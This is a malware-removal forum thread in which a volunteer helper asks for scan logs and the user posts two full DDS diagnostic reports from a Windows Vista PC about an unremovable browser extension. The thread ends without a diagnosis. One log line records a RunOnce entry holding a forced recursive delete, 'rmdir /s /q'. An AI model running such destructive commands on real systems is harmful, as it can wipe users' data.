
Can't Remove YoTuBerAddsRemoVu Extension from Browsers


Hello alancarrr1 and welcome! My name is Borislav and I will be glad to help you solve your malware problem.

Please note:

  • If you are a paying customer, you have the privilege to contact the help desk at Consumer Support. If you choose this option to get help, please let me know.
  • I recommend that you keep the instructions I will be giving you so that they are available to you at any time. You can save them in a text file or print them.
  • Make sure you read all of the instructions and fixes thoroughly before continuing with them.
  • Follow my instructions strictly and don't hesitate to stop and ask me if you have any questions.
  • Post your log files, don't attach them. Every log file should be copy/pasted in your next reply.
  • Do not perform any kind of scanning and fixing without my instructions. If you want to proceed on your own, please let me know.

Please follow the instructions here and then post your log files in a new reply in this thread:

http://forums.malwarebytes.org/index.php?showtopic=9573


Hi Borislav,

Thanks for your reply.

Below are the contents of the two files:

ATTACH.txt


.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft® Windows Vista™ Home Premium 
Boot Device: \Device\HarddiskVolume1
Install Date: 25/03/2011 12:58:04
System Uptime: 21/03/2014 11:13:41 (56 hours ago)
.
Motherboard: OEM_MB |  | Acacia
Processor: AMD Phenom 8250e Triple-Core Processor | Socket AM2  | 1900/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 452 GiB total, 248.951 GiB free.
D: is FIXED (NTFS) - 14 GiB total, 1.916 GiB free.
E: is CDROM ()
F: is Removable
G: is Removable
H: is Removable
I: is Removable
J: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP788: 11/03/2014 01:39:27 - Scheduled Checkpoint
RP789: 12/03/2014 01:10:44 - Scheduled Checkpoint
RP790: 13/03/2014 00:37:37 - Scheduled Checkpoint
RP791: 13/03/2014 20:52:39 - Installed Java 7 Update 51
RP792: 14/03/2014 03:00:31 - Windows Update
RP793: 14/03/2014 16:18:46 - Removed Skype™ 6.14
RP794: 14/03/2014 16:25:56 - Removed Skype Click to Call
RP795: 14/03/2014 16:26:43 - Removed Skype Click to Call
RP796: 14/03/2014 16:28:51 - Removed Visual Studio 2008 x64 Redistributables
RP797: 14/03/2014 16:29:08 - Removed Visual Studio 2008 x64 Redistributables
RP798: 14/03/2014 16:30:21 - Removed Bonjour
RP799: 14/03/2014 16:31:05 - Removed Camtasia Studio 6
RP800: 15/03/2014 17:53:50 - Scheduled Checkpoint
RP801: 17/03/2014 01:05:42 - Scheduled Checkpoint
RP802: 18/03/2014 00:51:48 - Scheduled Checkpoint
RP803: 18/03/2014 05:44:33 - Windows Update
RP804: 19/03/2014 00:00:06 - Scheduled Checkpoint
RP805: 19/03/2014 03:00:12 - Windows Update
RP806: 20/03/2014 04:03:47 - Scheduled Checkpoint
RP807: 21/03/2014 00:33:38 - Revo Uninstaller's restore point - Network Acceleration
RP808: 21/03/2014 00:38:27 - Revo Uninstaller's restore point - Adobe AIR
RP809: 21/03/2014 00:40:09 - Revo Uninstaller's restore point - ConTEXT v0.98.6
RP810: 21/03/2014 00:45:03 - Revo Uninstaller's restore point - firstobject XML Editor version 2.4.2
RP811: 21/03/2014 00:46:11 - Revo Uninstaller's restore point - MainConcept MPEG2 Software Encoder_x64
RP812: 21/03/2014 00:47:00 - Removed MainConcept MPEG2 Software Encoder_x64
RP813: 21/03/2014 00:47:56 - Revo Uninstaller's restore point - DVD Play BD
RP814: 21/03/2014 01:01:40 - Revo Uninstaller's restore point - muvee autoProducer 6.1
RP815: 21/03/2014 01:03:17 - Removed muvee autoProducer 6.1
RP816: 21/03/2014 02:17:45 - Revo Uninstaller's restore point - Adobe Reader X (10.1.9)
RP817: 21/03/2014 02:22:23 - Revo Uninstaller's restore point - Java 7 Update 51
RP818: 21/03/2014 02:22:35 - Removed Java 7 Update 51
RP819: 21/03/2014 17:00:18 - Scheduled Checkpoint
.
==== Installed Programs ======================
.
Adobe Bridge 1.0
Adobe Common File Installer
Adobe Download Assistant
Adobe Flash Player 12 Plugin
Adobe Flash Player ActiveX
Adobe Help Center 1.0
Adobe Help Manager
Adobe Photoshop CS2
Adobe Shockwave Player 12.0
Adobe Stock Photos 1.0
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Audacity 2.0.5
Cards_Calendar_OrderGift_DoMorePlugout
Compatibility Pack for the 2007 Office system
CyberLink DVD Suite Deluxe
Enhanced Multimedia Keyboard Solution
FileZilla Client 3.7.0.2
Google Chrome
Google Update Helper
Hardware Diagnostic Tools
Hewlett-Packard Active Check for Health Check
Hewlett-Packard Asset Agent for Health Check
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
HP Active Support Library
HP Customer Experience Enhancements
HP Customer Feedback
HP Demo
HP Easy Setup - Frontend
HP On-Screen Cap/Num/Scroll Lock Indicator
HP Photosmart Essential 2.5
HP Photosmart Essential 3.0
HP Picasso Media Center Add-In
HP Recovery Manager RSS
HP Total Care Advisor
HP Update
HPPhotoSmartPhotobookWebPack1
HTML5 Video Player
iTunes
Java 7 Update 21 (64-bit)
LabelPrint
LightScribe System Software  1.14.17.1
Malwarebytes Anti-Malware version 1.75.0.1300
Microsoft .NET Framework 3.5 SP1
Microsoft .NET Framework 4.5.1
Microsoft Corporation
Microsoft LifeCam
Microsoft Office 2007 Service Pack 3 (SP3)
Microsoft Office Access MUI (English) 2007
Microsoft Office Access Setup Metadata MUI (English) 2007
Microsoft Office Enterprise 2007
Microsoft Office Excel MUI (English) 2007
Microsoft Office File Validation Add-In
Microsoft Office Groove MUI (English) 2007
Microsoft Office Groove Setup Metadata MUI (English) 2007
Microsoft Office InfoPath MUI (English) 2007
Microsoft Office Office 64-bit Components 2007
Microsoft Office OneNote MUI (English) 2007
Microsoft Office Outlook MUI (English) 2007
Microsoft Office PowerPoint MUI (English) 2007
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Proof (English) 2007
Microsoft Office Proof (French) 2007
Microsoft Office Proof (Spanish) 2007
Microsoft Office Proofing (English) 2007
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
Microsoft Office Publisher MUI (English) 2007
Microsoft Office Shared 64-bit MUI (English) 2007
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007
Microsoft Office Shared MUI (English) 2007
Microsoft Office Shared Setup Metadata MUI (English) 2007
Microsoft Office Word MUI (English) 2007
Microsoft Silverlight
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30411
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
Microsoft Works
Microsoft_VC80_CRT_x86
Microsoft_VC90_CRT_x86
Mozilla Firefox 27.0.1 (x86 en-US)
Mozilla Maintenance Service
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MySQL Server 5.0
Notepad++
NVIDIA Drivers
Opera 12.14
Power2Go
PowerDirector
PSSWCORE
Python 2.5.2
QuickTime
Realtek High Definition Audio Driver
Revo Uninstaller 1.95
Safari
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2604111)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2736416)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2840629)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2861697)
Security Update for Microsoft .NET Framework 4.5.1 (KB2898869)
Security Update for Microsoft .NET Framework 4.5.1 (KB2901126)
Security Update for Microsoft Office 2007 suites (KB2596744) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2596754) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2596792) 32-Bit Edition
Security Update for Microsoft Office 2007 suites (KB2596825) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2596871) 32-Bit Edition
Security Update for Microsoft Office 2007 suites (KB2597969) 32-Bit Edition
Security Update for Microsoft Office 2007 suites (KB2597973) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2687439) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760411) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760415) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760585) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2760591) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2817641) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2827326) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2837615) 32-Bit Edition 
Security Update for Microsoft Office 2007 suites (KB2850022) 32-Bit Edition 
Security Update for Microsoft Office Excel 2007 (KB2827324) 32-Bit Edition 
Security Update for Microsoft Office InfoPath 2007 (KB2687440) 32-Bit Edition 
Security Update for Microsoft Office Outlook 2007 (KB2825644) 32-Bit Edition 
Security Update for Microsoft Office PowerPoint 2007 (KB2596764) 32-Bit Edition
Security Update for Microsoft Office PowerPoint 2007 (KB2596912) 32-Bit Edition
Security Update for Microsoft Office Publisher 2007 (KB2597971) 32-Bit Edition 
Security Update for Microsoft Office Word 2007 (KB2837617) 32-Bit Edition 
Skype™ 6.14
swMSM
Tracker
Update for 2007 Microsoft Office System (KB967642)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft Office 2007 Help for Common Features (KB963673)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition
Update for Microsoft Office 2007 suites (KB2687493) 32-Bit Edition
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition
Update for Microsoft Office Access 2007 Help (KB963663)
Update for Microsoft Office Excel 2007 Help (KB963678)
Update for Microsoft Office Infopath 2007 Help (KB963662)
Update for Microsoft Office OneNote 2007 Help (KB963670)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition
Update for Microsoft Office Outlook 2007 Help (KB963677)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2878234) 32-Bit Edition
Update for Microsoft Office Powerpoint 2007 Help (KB963669)
Update for Microsoft Office Publisher 2007 Help (KB963667)
Update for Microsoft Office Script Editor Help (KB963671)
Update for Microsoft Office Word 2007 Help (KB963665)
VideoToolkit01
WinRAR 5.01 (64-bit)
WinSCP 5.1.4
ZTE USB Driver
.
==== Event Viewer Messages From Past Week ========
.
21/03/2014 11:15:45, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  i8042prt
21/03/2014 11:15:45, Error: Service Control Manager [7000]  - The MySQL56 service failed to start due to the following error:  The system cannot find the path specified.
21/03/2014 11:15:45, Error: Service Control Manager [7000]  - The LogMeIn Kernel Information Provider service failed to start due to the following error:  The system cannot find the path specified.
21/03/2014 10:57:15, Error: Microsoft-Windows-WindowsUpdateClient [20]  - Installation Failure: Windows failed to install the following update with error 0x80070643: Definition Update for Windows Defender - KB915597 (Definition 1.169.394.0).
21/03/2014 02:19:46, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the Windows Search service to connect.
21/03/2014 02:19:46, Error: Service Control Manager [7000]  - The Windows Search service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
21/03/2014 02:19:46, Error: Microsoft-Windows-DistributedCOM [10005]  - DCOM got error "1053" attempting to start the service WSearch with arguments "" in order to run the server: {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}
21/03/2014 02:05:37, Error: Service Control Manager [7030]  - The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
21/03/2014 01:57:39, Error: Service Control Manager [7034]  - The MySQL service terminated unexpectedly.  It has done this 1 time(s).
21/03/2014 01:48:45, Error: Service Control Manager [7034]  - The Easybits Shared Services for Windows service terminated unexpectedly.  It has done this 1 time(s).
.
==== End Of File ===========================

DDS.txt

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 9.0.8112.16540
Run by Alan at 19:43:08 on 2014-03-23
Microsoft® Windows Vista™ Home Premium   6.0.6002.2.1252.44.1033.18.3966.1345 [GMT 0:00]
.
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\rundll32.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Windows\SysWOW64\svchost.exe -k netsvcs
c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
C:\Windows\system32\lxdwcoms.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Microsoft LifeCam\MSCamS64.exe
C:\Program Files (x86)\MySQL\MySQL Server 5.0\bin\mysqld-nt.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\PrintCtrl.exe
C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\PrintDisp.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Windows\ehome\ehmsas.exe
C:\hp\support\hpsysdrv.exe
C:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe
C:\Program Files (x86)\HP\HP Software Update\hpwuSchd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\hp\kbd\kbd.exe
c:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Adobe\Adobe Photoshop CS2\Photoshop.exe
C:\Users\Alan\AppData\Local\Temp\Adobelm_Cleanup.0001
C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
C:\Users\Alan\AppData\Local\Temp\Adobelm_Cleanup.0001
C:\Windows\splwow64.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Internet Explorer\IELowutil.exe
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\Program Files (x86)\FileZilla FTP Client\filezilla.exe
C:\Windows\System32\mobsync.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uProxyServer = localhost:8080
uRun: [sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
uRun: [HPAdvisor] C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe autorun=AUTORUN
uRun: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
uRun: [skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
mRun: [hpsysdrv] c:\hp\support\hpsysdrv.exe
mRun: [KBD] C:\HP\KBD\KbdStub.EXE
mRun: [OsdMaestro] c:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe
mRun: [HP Health Check Scheduler] c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
mRun: [HP Software Update] c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [GrooveMonitor] "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [LifeCam] "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
mRunOnce: [AvgUninstallURL] cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-appf?lic=NFVIMlctM1NYM0UtR0hHWDktQUZISjMtUFcyUU4tWjlLSDQ"&"inst=NzctMTcxMjQyMzM4Ni1MSUMrMTEtU1AxKzEtU1VEKzEtUzFJKzEtU1UzKzEtRkwxMCsxLVNUMTBGQVBQKzEtRERUKzAtRjEwTTEyUisxLVZJUDEyKzEtRjEwTTEyUjIrMS1DSUQxMCsxLUNJRCsxMA"&"prod=90"&"ver=10.0.1432
dRunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect"
StartupFolder: C:\Users\Alan\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\ADOBEG~1.LNK - C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
StartupFolder: C:\Users\Alan\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Tracker.lnk - C:\Program Files (x86)\Tracker\Tracker.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
TCP: NameServer = 192.168.1.254
TCP: Interfaces\{20DD8DB8-06EA-4D40-A3CC-B974B24382EB} : DHCPNameServer = 192.168.1.254
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\32.0.1700.107\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\System32\NvCpl.dll,NvStartup
x64-Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\System32\NvMcTray.dll,NvTaskbarInit
x64-Run: [PrintDisp] C:\Windows\System32\PrintDisp.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: keyword.URL - 
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrlui.dll
FF - plugin: C:\Users\Alan\AppData\Local\Citrix\Plugins\104\npappdetector.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll
.
============= SERVICES / DRIVERS ===============
.
R2 ezSharedSvc;Easybits Shared Services for Windows;C:\Windows\System32\svchost.exe -k netsvcs [2008-1-21 27648]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-21 27648]
R2 LMIRfsDriver;LogMeIn Remote File System Driver;C:\Windows\System32\drivers\LMIRfsDriver.sys [2013-6-20 72216]
R2 lxdw_device;lxdw_device;C:\Windows\System32\lxdwcoms.exe -service --> C:\Windows\System32\lxdwcoms.exe -service [?]
R2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [2014-2-18 418376]
R2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [2014-2-18 701512]
R2 Printer Control;Printer Control;C:\Windows\System32\PrintCtrl.exe [2013-12-20 121856]
R3 3xHybr64;ASUSTek SAA713x PCI Card;C:\Windows\System32\drivers\3xHybr64.sys [2007-1-26 3110656]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2011-3-25 25928]
R3 MSHUSBVideo;NX6000/NX3000/VX2000/VX5000/VX5500/VX7000/Cinema Filter Driver;C:\Windows\System32\drivers\nx6000.sys [2010-12-13 36720]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2013-9-11 124088]
S2 MySQL56;MySQL56;"C:/Program Files/MySQL/MySQL Server 5.6/bin\mysqld" --defaults-file="C:\ProgramData\MySQL\MySQL Server 5.6\my.ini" MySQL56 --> C:/Program Files/MySQL/MySQL Server 5.6/bin\mysqld [?]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 massfilter;ZTE Mass Storage Filter Driver;C:\Windows\System32\drivers\massfilter.sys [2012-9-5 11776]
S3 Netaapl;Apple Mobile Device Ethernet Service;C:\Windows\System32\drivers\netaapl64.sys [2012-9-10 22528]
S3 PerfHost;Performance Counter DLL Host;C:\WINDOWS\SysWOW64\perfhost.exe [2008-1-21 19968]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2013-9-11 1012344]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\WINDOWS\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2011-3-29 89920]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %* [userChoice]
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M  ====================
.
2014-03-21 02:51:51 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-03-19 03:01:02 90015360 ----a-w- C:\Windows\System32\mrt.exe
2014-03-12 04:34:52 71048 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2014-03-12 04:34:52 692616 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2014-02-23 07:12:29 17847808 ----a-w- C:\Windows\System32\mshtml.dll
2014-02-23 06:54:58 2334720 ----a-w- C:\Windows\System32\jscript9.dll
2014-02-23 06:52:45 10926592 ----a-w- C:\Windows\System32\ieframe.dll
2014-02-23 06:48:43 1347072 ----a-w- C:\Windows\System32\urlmon.dll
2014-02-23 06:48:31 1392128 ----a-w- C:\Windows\System32\wininet.dll
2014-02-23 06:46:42 1494528 ----a-w- C:\Windows\System32\inetcpl.cpl
2014-02-23 06:46:20 237056 ----a-w- C:\Windows\System32\url.dll
2014-02-23 06:46:08 86016 ----a-w- C:\Windows\System32\jsproxy.dll
2014-02-23 06:45:36 173056 ----a-w- C:\Windows\System32\ieUnatt.exe
2014-02-23 06:45:32 816640 ----a-w- C:\Windows\System32\jscript.dll
2014-02-23 06:45:27 599040 ----a-w- C:\Windows\System32\vbscript.dll
2014-02-23 06:44:57 729088 ----a-w- C:\Windows\System32\msfeeds.dll
2014-02-23 06:44:57 2147840 ----a-w- C:\Windows\System32\iertutil.dll
2014-02-23 06:44:14 96768 ----a-w- C:\Windows\System32\mshtmled.dll
2014-02-23 06:44:02 2382848 ----a-w- C:\Windows\System32\mshtml.tlb
2014-02-23 06:43:22 248320 ----a-w- C:\Windows\System32\ieui.dll
2014-02-23 05:50:22 12347904 ----a-w- C:\Windows\SysWow64\mshtml.dll
2014-02-23 05:47:19 1806848 ----a-w- C:\Windows\SysWow64\jscript9.dll
2014-02-23 05:43:55 9739264 ----a-w- C:\Windows\SysWow64\ieframe.dll
2014-02-23 05:41:03 1105408 ----a-w- C:\Windows\SysWow64\urlmon.dll
2014-02-23 05:40:18 1129472 ----a-w- C:\Windows\SysWow64\wininet.dll
2014-02-23 05:39:28 1427968 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2014-02-23 05:38:15 231936 ----a-w- C:\Windows\SysWow64\url.dll
2014-02-23 05:38:08 65536 ----a-w- C:\Windows\SysWow64\jsproxy.dll
2014-02-23 05:38:08 142848 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2014-02-23 05:37:49 421376 ----a-w- C:\Windows\SysWow64\vbscript.dll
2014-02-23 05:37:28 717824 ----a-w- C:\Windows\SysWow64\jscript.dll
2014-02-23 05:37:12 607744 ----a-w- C:\Windows\SysWow64\msfeeds.dll
2014-02-23 05:37:09 1796096 ----a-w- C:\Windows\SysWow64\iertutil.dll
2014-02-23 05:36:31 73216 ----a-w- C:\Windows\SysWow64\mshtmled.dll
2014-02-23 05:36:22 2382848 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2014-02-23 05:35:49 176640 ----a-w- C:\Windows\SysWow64\ieui.dll
2014-02-07 12:11:49 2776064 ----a-w- C:\Windows\System32\win32k.sys
2014-02-03 13:20:59 619008 ----a-w- C:\Windows\System32\qedit.dll
2014-02-03 10:37:54 505344 ----a-w- C:\Windows\SysWow64\qedit.dll
2014-01-30 10:12:47 1111040 ----a-w- C:\Windows\System32\wer.dll
2014-01-30 07:46:58 876032 ----a-w- C:\Windows\SysWow64\wer.dll
.
============= FINISH: 19:44:08.51 ===============

